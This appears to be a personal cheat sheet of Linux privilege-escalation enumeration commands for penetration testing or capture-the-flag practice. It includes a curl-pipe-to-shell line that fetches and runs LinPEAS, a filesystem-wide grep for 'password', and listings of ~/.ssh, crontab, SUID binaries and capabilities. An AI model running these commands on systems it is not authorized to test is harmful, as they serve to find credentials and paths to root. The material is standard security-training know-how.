
echo "---SUID---"; find / -perm -u=s -type f 2>/dev/null; echo "---Caps---"; getcap -r / 2>/dev/null; echo "---Writable---"; find / -writable -type d 2>/dev/null

---------------------------------

curl -L https://github.com | sh    run LinPeas

--------------------------------

sudo -l

--------------

find / -perm -u=s -type f 2>/dev/null


---------------------------------------

id   |  history    |   uname -a

-------------------------------------

getcap -r / 2>/dev/null

--------------------------

cat /etc/crontab      |   ls -la ~/.ssh

----------------------------------------

find / -writable -type d 2>/dev/null

----------------------------------------

grep -rnw '/' -e "password" 2>/dev/null     |  Recursively searches the entire filesystem for files containing the word "password" (can be noisy).

----------------------------------------

ps aux | grep root    |    Shows all processes running as root. This helps identify custom scripts or vulnerable services.

-----------------------------------------------------------

ss -tulnp (or netstat -tulnp)  |      Lists open ports and listening services. Look for "localhost-only" services (127.0.0.1) that aren't visible from the outside.
